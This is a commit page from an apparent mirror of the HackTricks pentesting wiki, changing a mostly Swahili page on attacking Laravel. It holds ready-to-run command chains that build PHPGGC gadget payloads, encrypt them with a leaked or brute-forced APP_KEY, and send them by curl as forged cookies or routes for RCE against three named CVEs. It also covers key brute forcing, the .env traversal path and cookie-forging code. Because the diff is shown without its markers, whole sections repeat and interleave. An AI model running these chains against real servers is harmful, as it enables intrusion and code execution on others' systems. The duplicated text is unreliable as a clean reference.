maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/laravel.md']

Browse Source
This commit is contained in:
Translator 2025-08-04 22:30:15 +00:00
parent 52b5bc0950
commit 9606a44636
1 changed files with 47 additions and 115 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

162
src/network-services-pentesting/pentesting-web/laravel.md
View File

@ -11,7 +11,7 @@ Soma habari kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-l
## APP_KEY & Msingi wa Uthibitishaji (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) na HMAC uaminifu chini ya uso (`Illuminate\\Encryption\\Encrypter`).
Ciphertext safi ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama:
Ciphertext ya raw ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama:
```json
{
"iv" : "Base64(random 16-byte IV)",
@ -29,12 +29,12 @@ use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Ingiza string iliyozalishwa kwenye chochote kilichovuja `decrypt()` sink (paramu ya njia, cookie, kikao, …).
Ingiza mfuatano uliozalishwa kwenye chochote kilicho hatarini `decrypt()` sink (paramu ya njia, cookie, kikao, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inafanya mchakato mzima kuwa wa kiotomatiki na kuongeza hali rahisi ya **bruteforce**:
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inaweka mchakato mzima kuwa otomatiki na kuongeza hali rahisi ya **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
@ -45,66 +45,76 @@ laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
The script inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag.
The script inasaidia kwa uwazi payloads za CBC na GCM na inarejesha uwanja wa HMAC/tag.
---
## Mifano halisi ya udhaifu
| Mradi | Kitu kinachoweza kuathiriwa | Mnyororo wa gadget |
|-------|-----------------------------|--------------------|
| Mradi | Kitu kilichoharibika | Mnyororo wa gadget |
|-------|----------------------|--------------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Mchakato wa unyakuzi daima ni:
1. Pata `APP_KEY` (mfano wa chaguo-msingi, kuvuja kwa Git, kuvuja kwa config/.env, au brute-force)
2. Zalisha gadget na **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Toa payload kupitia parameter/cookie inayoweza kuathiriwa → **RCE**
1. Pata au fanya brute-force ya `APP_KEY` ya byte 32.
2. Jenga mnyororo wa gadget na **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`).
3. Ficha gadget iliyosajiliwa na **laravel_crypto_killer.py** na `APP_KEY` iliyopatikana.
4. Toa ciphertext kwa sink iliyo hatarini `decrypt()` (parameta ya route, cookie, session …) ili kuanzisha **RCE**.
Hapa chini kuna mistari mifupi inayoonyesha njia kamili ya shambulio kwa kila CVE halisi iliyotajwa hapo juu:
```bash
# Invoice Ninja ≤5 /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"
# Snipe-IT ≤6 XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
# Crater cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```
---
## Ugunduzi wa wingi wa APP_KEY kupitia brute-force ya cookie
## Ugunduzi wa APP_KEY wa Misa kupitia brute-force ya cookie
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinavuja mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao.
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinatoa mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao.
Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):
* Dataset Julai 2024 » 580 k tokens, **3.99 % funguo zimevunjwa** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % funguo zimevunjwa**
* >1 000 seva bado zina udhaifu kwa CVE-2018-15133 ya zamani kwa sababu tokens zinajumuisha moja kwa moja data iliyosimbwa.
* Matumizi makubwa ya funguo Top-10 APP_KEYs zimeandikwa kwa chaguo-msingi ambazo zimesambazwa na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
* Dataset Julai 2024 » 580 k tokens, **3.99 % ya funguo zimevunjwa** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % ya funguo zimevunjwa**
* >1 000 seva bado zina hatari kutokana na CVE-2018-15133 ya zamani kwa sababu tokens zina data iliyosimbwa moja kwa moja.
* Matumizi makubwa ya funguo APP_KEYs 10 bora zimeandikwa kwa defaults ambazo zinakuja na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM brute-force hadi ~1.5 bilioni majaribio/s, ikipunguza muda wa kuvunja dataset kamili hadi <2 dakika.
Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM bruteforce hadi ~1.5 bilioni majaribio/s, ikipunguza uvunjaji wa dataset kamili hadi <2 dakika.
---
## Marejeleo
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
## Hila za Laravel
## Laravel Tricks
### Hali ya Ukarabati
### Modu ya Debugging
Ikiwa Laravel iko katika **modu ya debugging** utaweza kufikia **code** na **data nyeti**.\
Ikiwa Laravel iko katika **hali ya ukarabati** utaweza kufikia **kod** na **data nyeti**.\
Kwa mfano `http://127.0.0.1:8000/profiles`:
![](<../../images/image (1046).png>)
Hii kwa kawaida inahitajika kwa ajili ya kutumia udhaifu mwingine wa RCE wa Laravel.
Hii kwa kawaida inahitajika kwa ajili ya kutumia CVEs nyingine za RCE za Laravel.
### .env
Laravel huhifadhi APP inayotumia kusimbua cookies na akreditivu nyingine ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia baadhi ya njia za kupita: `/../.env`
Laravel huhifadhi APP inayotumia kusimbua cookies na akreditivu nyingine ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia njia fulani ya kupita: `/../.env`
Laravel pia itaonyesha habari hii ndani ya ukurasa wa debug (ambao unaonekana wakati Laravel inapata kosa na umewezeshwa).
Laravel pia itaonyesha habari hii ndani ya ukurasa wa ukarabati (ambao unaonekana wakati Laravel inapata kosa na umewezeshwa).
Kwa kutumia APP_KEY ya siri ya Laravel unaweza kusimbua na kusimbua tena cookies:
### Decrypt Cookie
### Futa Cookie
```python
import os
import json
@ -165,100 +175,22 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
```
### Laravel Deserialization RCE
Toleo lenye udhaifu: 5.5.40 na 5.6.x kupitia 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Tofauti zinazoweza kutumika: 5.5.40 na 5.6.x kupitia 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Hapa unaweza kupata taarifa kuhusu udhaifu wa deserialization hapa: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Unaweza kujaribu na kutumia kwa kutumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kutumia kwa metasploit: `use unix/http/laravel_token_unserialize_exec`
Au unaweza pia kutumia metasploit: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129
Deserialization nyingine: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
Udhaifu mwingine wa deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
### Laravel SQLInjection
Soma taarifa kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
### Laravel SQLInjection
Soma taarifa kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
---
## APP_KEY & Encryption internals (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) na HMAC uadilifu chini ya uso (`Illuminate\\Encryption\\Encrypter`).
Ciphertext safi ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama:
```json
{
"iv" : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` itafanya `serialize()` maandiko ya wazi kwa chaguo-msingi, wakati `decrypt($payload, $unserialize=true)` **itautumia kiotomatiki `unserialize()`** thamani iliyofichwa. Hivyo basi **mshambuliaji yeyote anayejua siri ya byte 32 `APP_KEY` anaweza kuunda kitu kilichofichwa cha PHP kilichosajiliwa na kupata RCE kupitia mbinu za kichawi (`__wakeup`, `__destruct`, …)**.
Minimal PoC (framework ≥9.x):
```php
use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Ingiza string iliyozalishwa kwenye chochote kilichovuja `decrypt()` sink (paramu ya njia, cookie, kikao, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inafanya mchakato mzima kuwa wa kiotomatiki na kuongeza hali rahisi ya **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
The script inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag.
---
## Mifano halisi ya udhaifu
| Mradi | Kitu kilichoharibika | Mnyororo wa gadget |
|-------|----------------------|--------------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Mchakato wa unyakuzi daima ni:
1. Pata `APP_KEY` (mfano wa chaguo-msingi, kuvuja kwa Git, kuvuja kwa config/.env, au brute-force)
2. Zalisha gadget na **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Toa payload kupitia parameter/cookie iliyoathirika → **RCE**
---
## Ugunduzi wa wingi wa APP_KEY kupitia brute-force ya cookie
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinavuja mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao.
Utafiti uliochapishwa na Synacktiv (2024-2025) umebaini:
* Dataset Julai 2024 » 580 k tokens, **3.99 % funguo zimevunjwa** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % funguo zimevunjwa**
* >1 000 seva bado zina udhaifu wa CVE-2018-15133 kwa sababu tokens zinajumuisha moja kwa moja data iliyosimbwa.
* Matumizi makubwa ya funguo Top-10 APP_KEYs zimeandikwa kwa chaguo-msingi ambazo zimesambazwa na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM bruteforce hadi ~1.5 bilioni majaribio/s, ikipunguza muda wa kuvunja dataset kamili hadi <2 dakika.
---
## Marejeleo
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
## References
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite dAPP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)